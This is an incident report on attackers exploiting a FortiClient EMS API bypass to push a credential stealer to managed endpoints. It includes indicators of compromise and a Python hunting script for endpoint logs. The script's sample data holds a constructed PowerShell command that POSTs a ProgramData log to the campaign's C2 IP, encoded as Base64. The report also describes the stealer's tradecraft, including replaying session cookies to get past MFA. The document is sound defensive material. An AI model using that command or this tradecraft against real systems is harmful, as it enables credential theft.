Full Report
Threat actors are continuing to exploit a critical, now-patched security flaw impacting FortiClient Endpoint Management Server (EMS) deployments to deliver credential-stealing malware. "The campaign abused trusted endpoint management infrastructure to deliver malware across managed endpoints," Arctic Wolf said. "Threat actors disguised the credential stealer payload as a Fortinet endpoint
Analysis Summary
# Incident Report: Exploitation of FortiClient EMS Flaw (CVE-2026-35616)
## Executive Summary
Threat actors exploited a critical vulnerability in FortiClient Endpoint Management Server (EMS) to distribute a custom credential-stealing malware. By bypassing API authentication, attackers weaponized trusted management infrastructure to push malicious PowerShell scripts to managed endpoints. The campaign resulted in the theft of browser-based credentials and session data, potentially enabling follow-on access to cloud and internal resources.
## Incident Details
- **Discovery Date:** May 2026
- **Incident Date:** May 2026
- **Affected Organization:** Not disclosed (multiple FortiClient EMS deployments)
- **Sector:** Various (Users of FortiClient EMS)
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** May 2026
- **Vector:** Exploitation of CVE-2026-35616
- **Details:** Attackers exploited a critical pre-authentication API access bypass vulnerability (CVSS 9.1) in FortiClient EMS to gain unauthorized privileged access to the management console.
### Lateral Movement
- **Details:** Attackers did not need traditional lateral movement; instead, they "moved" by abusing the trusted EMS management pathway. By modifying Remote Access Profiles and endpoint policies, the actors pushed malicious commands from the central server to the managed endpoints, so a single compromised management server translated directly into code execution on every endpoint it administered.
### Data Exfiltration/Impact
- **Details:** Managed endpoints executed a malicious payload disguised as `FortiEndpoint_Patch.exe`. This stealer harvested passwords, cookies, credit card details, and autofill data from Chromium and Gecko-based browsers. Data was exfiltrated via HTTP POST requests to an attacker-controlled IP.
### Detection & Response
- **Discovery:** Identified by Arctic Wolf researchers observing anomalous PowerShell execution patterns originating from the EMS infrastructure.
- **Response Actions:** Arctic Wolf and Fortinet released technical analyses; Fortinet released patches (FortiClient EMS version 7.4.7 and later) to address the underlying API vulnerability.
## Attack Methodology
- **Initial Access:** Pre-authentication API access bypass (CVE-2026-35616).
- **Persistence:** Modification of Remote Access Profile configurations and endpoint policies within the EMS.
- **Privilege Escalation:** API bypass allowed acting in a privileged context without valid credentials.
- **Defense Evasion:** Used legitimate `fortitray.exe` to launch scripts; disguised payload as a legitimate update (`FortiEndpoint_Patch.exe`); deferred firmware upgrade reminders to avoid administrator intervention.
- **Credential Access:** Scraping Chromium/Gecko browser databases for cookies, passwords, and PII.
- **Discovery:** Leveraged EMS visibility to identify all managed endpoints.
- **Lateral Movement:** Abused internal management pathways ("Living off the Campus").
- **Collection:** Logged stolen data into local files in the `ProgramData` directory.
- **Exfiltration:** Base64-encoded PowerShell script sent logs to C2 via HTTP POST.
- **Impact:** Theft of session tokens and credentials to bypass MFA and access internal applications.
## Impact Assessment
- **Financial:** Potential for secondary fraud using stolen credit card data.
- **Data Breach:** High; widespread theft of browser-stored identity and financial information across managed endpoints.
- **Operational:** Minimal immediate disruption, but high long-term risk due to compromised credentials.
- **Reputational:** Loss of trust in endpoint management infrastructure.
## Indicators of Compromise (Defanged)
- **Network Indicators:**
- `83.138.53[.]110` (C2 IP)
- **File Indicators:**
- `FortiEndpoint_Patch.exe` (Infostealer executable)
- **Behavioral Indicators:**
- `fortitray.exe` spawning `cmd.exe` to execute Base64 PowerShell.
- Modification of EMS "Remote Access Profile" to include unexpected scripts.
- Silent execution of scripts via PowerShell on endpoints.
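The behavioural and network indicators above can be turned into a hunting rule over endpoint telemetry. The following is an added example, not code from the Arctic Wolf or Fortinet write-ups: it applies the indicators (FortiTray spawning a shell, Base64 `-EncodedCommand` PowerShell, the `FortiEndpoint_Patch.exe` filename, and connections to the C2 address) to Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) events. The event lines and the decoded PowerShell command are constructed for illustration; the field names follow Sysmon's, and the C2 address is the report's indicator refanged so it matches what real logs would contain.

```python
import base64
import re
from typing import Dict, List, Optional

C2_IP = "83.138.53.110"                 # report's network indicator, refanged for matching
PAYLOAD_NAME = "fortiendpoint_patch.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# -EncodedCommand and its accepted abbreviations, followed by a Base64 token
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Key=Value or Key="quoted value" pairs in a single event line
KV = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def encode_powershell(cmd: str) -> str:
    """PowerShell's -EncodedCommand takes Base64 of the UTF-16LE command text."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def parse_event(line: str) -> Dict[str, str]:
    """Parse one key=value event line into a dict, stripping quotes from quoted values."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(2)
            for m in KV.finditer(line)}


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload if one is present and valid, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(lines: List[str]) -> List[Dict[str, str]]:
    """Apply the report's behavioural and network indicators to event lines."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmdline = ev.get("CommandLine", "")
        # Indicator: legitimate FortiTray launching a shell (not normal tray behaviour)
        if parent == "fortitray.exe" and image in SHELLS:
            findings.append({"rule": "fortitray_spawns_shell", "image": image, "cmdline": cmdline})
        # Indicator: Base64-encoded PowerShell, decoded so an analyst can read the intent
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append({"rule": "encoded_powershell", "image": image, "decoded": decoded})
        # Indicator: the stealer masquerading as a Fortinet patch
        if ev.get("EventID") == "1" and image == PAYLOAD_NAME:
            findings.append({"rule": "payload_filename", "image": image, "path": ev.get("Image", "")})
        # Indicator: any process connecting to the C2 address
        if ev.get("EventID") == "3" and ev.get("DestinationIp") == C2_IP:
            findings.append({"rule": "c2_connection", "image": image,
                             "dest": f"{C2_IP}:{ev.get('DestinationPort', '?')}"})
    return findings


# Constructed PowerShell modelled on the described behaviour (POST of a ProgramData log to C2);
# this is illustrative, not the actual payload from the campaign.
MALICIOUS_PS = "Invoke-RestMethod -Uri http://83.138.53.110/ -Method Post -InFile C:\\ProgramData\\out.log"

# Constructed sample telemetry, not real logs.
SAMPLE_EVENTS = [
    'EventID=1 Image="C:\\Program Files\\Fortinet\\FortiClient\\FortiTray.exe" '
    'ParentImage="C:\\Windows\\explorer.exe" CommandLine="FortiTray.exe"',
    'EventID=1 Image="C:\\Windows\\System32\\cmd.exe" '
    'ParentImage="C:\\Program Files\\Fortinet\\FortiClient\\FortiTray.exe" '
    f'CommandLine="cmd.exe /c powershell -nop -w hidden -EncodedCommand {encode_powershell(MALICIOUS_PS)}"',
    'EventID=1 Image="C:\\ProgramData\\FortiEndpoint_Patch.exe" '
    'ParentImage="C:\\Windows\\System32\\cmd.exe" CommandLine="FortiEndpoint_Patch.exe"',
    'EventID=3 Image="C:\\ProgramData\\FortiEndpoint_Patch.exe" DestinationIp=83.138.53.110 DestinationPort=80',
    # benign admin script: -ExecutionPolicy must not be mistaken for -e <base64>
    'EventID=1 Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Windows\\explorer.exe" '
    'CommandLine="powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"',
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The parent/child pairing is the most durable of these indicators: the C2 address and the file name are trivially changed by the actor, whereas a tray helper spawning `cmd.exe` or PowerShell is abnormal regardless of the payload. Decoding the `-EncodedCommand` argument inline matters for triage because Base64 hides the destination host and the exfiltrated path from a plain string search.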
## Response Actions
- **Containment:** Isolation of affected EMS servers; blocking of the C2 IP at the perimeter.
- **Eradication:** Removal of malicious scripts from EMS policies; deletion of `FortiEndpoint_Patch.exe` and associated logs from `ProgramData`.
- **Recovery:** Updating FortiClient EMS to version 7.4.7 or later; rotating all browser-stored passwords; clearing local session cookies and, because the stolen copies remain valid until the server side expires them, revoking active sessions and refresh tokens at the identity provider and affected applications.
## Lessons Learned
- **Trust as a Vector:** Trusted management tools are high-value targets because they provide a direct, "authorized" path to every device in the organization.
- **API Security:** Critical pre-auth vulnerabilities in management interfaces remain a primary entry point for sophisticated actors.
- **MFA Circumvention:** Stolen session cookies remain a primary method for attackers to bypass Multi-Factor Authentication: a replayed cookie inherits a session that has already passed the MFA check, so no second factor is ever prompted.
## Recommendations
- **Patch Management:** Immediately upgrade FortiClient EMS to version 7.4.7 or higher.
- **Policy Monitoring:** Audit EMS policies and script deployments for unauthorized changes.
- **Zero Trust:** Implement "least privilege" for management servers, restrict their outbound connectivity to what administration actually requires, and monitor both the servers and the endpoints they manage for unexpected outbound traffic, since in this campaign the C2 communication originated from the endpoints rather than from the EMS itself.
- **Credential Hygiene:** Discourage the storage of highly sensitive passwords in browsers; prioritize the use of dedicated, enterprise-grade password managers.